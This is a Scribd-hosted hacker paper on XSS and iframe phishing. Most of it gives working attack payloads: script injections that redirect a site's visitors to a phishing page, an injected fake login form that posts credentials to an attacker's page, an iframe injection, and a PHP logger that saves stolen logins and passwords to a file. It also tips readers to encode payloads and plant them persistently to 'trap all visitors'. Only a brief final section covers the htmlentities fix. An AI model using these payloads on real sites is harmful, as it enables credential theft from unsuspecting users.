Scribd
Upload
450 views8 pages

XSS & Iframe Phishing Techniques

This document discusses different phishing techniques using cross-site scripting (XSS) and iframes. It describes XSS redirect phishing, XSS HTML injection phishing, and iframe phishing. It also provides examples of exploiting each technique and includes screenshots. The document concludes with a section about securing websites against these phishing techniques by using HTML encoding to prevent XSS vulnerabilities.

Uploaded by

Nermin Huskić
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
450 views8 pages

XSS & Iframe Phishing Techniques

This document discusses different phishing techniques using cross-site scripting (XSS) and iframes. It describes XSS redirect phishing, XSS HTML injection phishing, and iframe phishing. It also provides examples of exploiting each technique and includes screenshots. The document concludes with a section about securing websites against these phishing techniques by using HTML encoding to prevent XSS vulnerabilities.

Uploaded by

Nermin Huskić
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
  • Introduction
  • XSS Redirect Phishing
  • XSS HTML Inject Phishing
  • Iframe Phishing
  • Secure

By 599eme Man

Xss & Iframe Phishing Paper


Xss & Iframe Phishing

Introduction :
In this paper, you will learn the differents phishing from xss/iframe.
The xss gives the opportunity to interact with the user target (redirect, cookie and phishing, etc.).
Here you will see :

Xss Redirect Phishing

Xss Html Inject Phishing

Iframe Phishing

How Secure it

About me : 599eme Man


Flouf@[Link]

Special Thanks : Str0zen, [Link], Sheiry, Pr0h4ck3rz & Security-shell

Xss & Iframe Phishing Paper

By 599eme Man

Xss & Iframe Phishing Paper

By 599eme Man

Xss Redirect Phishing

The redirect phishing consists to redirect on a fake page who steal the victim's login as a true phishing page
but from the real website to our phishing page.

Example :

- Vulnerable site :

[Link]

- Xss redirect exploiting :

[Link]
search="'><script>[Link]="[Link]
// Replace [Link] by your phising page address

If the website countains a Xss persistent vuln, for example a guestbook, write & send it & all users who will
visite the guestbook will be redirected on your page.

<script>[Link]="[Link]
>
// Replace [Link] by your phising page address

Xss & Iframe Phishing Paper

By 599eme Man

Xss & Iframe Phishing Paper

By 599eme Man

Xss Html inject Phishing

The Xss Html inject consists to inject a code of a fake login page in the url to make a phishing page ON the
site.

Example :

- Vulnerable site :

[Link]

- Xss Html inject exploiting :

[Link]
content="text/html; charset=ISO-8859-1"http-equiv="content-type"
/><title></title></head><body><div style="text-align: center;"><form
Method="POST" Action="[Link]" Name="form">Phishingpage :<br /><br
/>Login :<br />&nbsp;<input name="login" /><br />Password :<br
/>&nbsp;<input name="Password" type="password" /><br /><br /><input
name="Valid" value="Ok !" type="submit" /><br /></form></div></body></html>
// Replace '[Link]' by your phishing page

Warning : Dont forgert to encode it !


If the website countains a Xss persistent vuln, for example a guestbook, write & send it & all users who will
visite the guestbook will see the phishing page and perhaps connect on.

<html><head><meta content="text/html; charset=ISO-8859-1"httpequiv="contenttype"


/><title></title></head><body><div style="text-align: center;"><form
Method="POST" Action="[Link]" Name="form">Phishingpage :<br /><br
/>Login :<br />&nbsp;<input name="login" /><br />Password :<br />&nbsp;<input
name="Password" type="password" /><br /><br /><input name="Valid"
value="Ok !" type="submit" /><br /></form></div></body></html>
// Replace '[Link]' by your phishing page

Xss & Iframe Phishing Paper

By 599eme Man

Xss & Iframe Phishing Paper

By 599eme Man

[Link] :

<?php
$login = $_POST['login'];
$password = $_POST['Password'];
$open = fopen('[Link]', 'a+');
fputs($open, 'Login : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>

- Xss Html inject Pic :

Xss & Iframe Phishing Paper

By 599eme Man

Xss & Iframe Phishing Paper

By 599eme Man

Iframe Phishing

The iframe phishing is such as the xss redirect phishing and html url phishing in one : its a redirect in iframe
on the web site.

Example :

- Vulnerable Site :

[Link]

- Iframe Phishing Exploiting :

[Link] src="[Link]
height="300" width="800"></iframe>
// Replace [Link] by your phishing page

Warning : Dont forget to encode it !

As the others methods if the web site countain a Xss persistent, you can inject the iframe code to trap all
visitors.

Xss & Iframe Phishing Paper

By 599eme Man

Xss & Iframe Phishing Paper

By 599eme Man

- Iframe Phishing Pic :

Xss & Iframe Phishing Paper

By 599eme Man

By 599eme Man

Xss & Iframe Phishing Paper

Secure
To secure the XSS/Iframe phishing you need to secure the XSS vuln : it's very easy, for this you need to use
htmlentities :

Example :

- Vulnerable code :

<?php
$var2 = $_GET['var1];
echo $var2
?>

- Secure Code with htmlentities :

<?php
if(isset($_GET['var1'])) // We check if $_GET['var1'] exists, if exists then we continue
{
echo htmlentities($_GET['var1'], ENT_QUOTES); // Print $_GET['var1']) with encoded quotes
}
?>

Xss & Iframe Phishing Paper

By 599eme Man

By 599eme Man

Xss & Iframe Phishing Paper

- Htmlentities($Original, ENT_QUOTES); convert :

$Original

->

Htmlentities($original,
ENT_QUOTES)

'

&#039;

"

&quot;

<

&lt;

>

&gt;

Xss & Iframe Phishing Paper

By 599eme Man

You might also like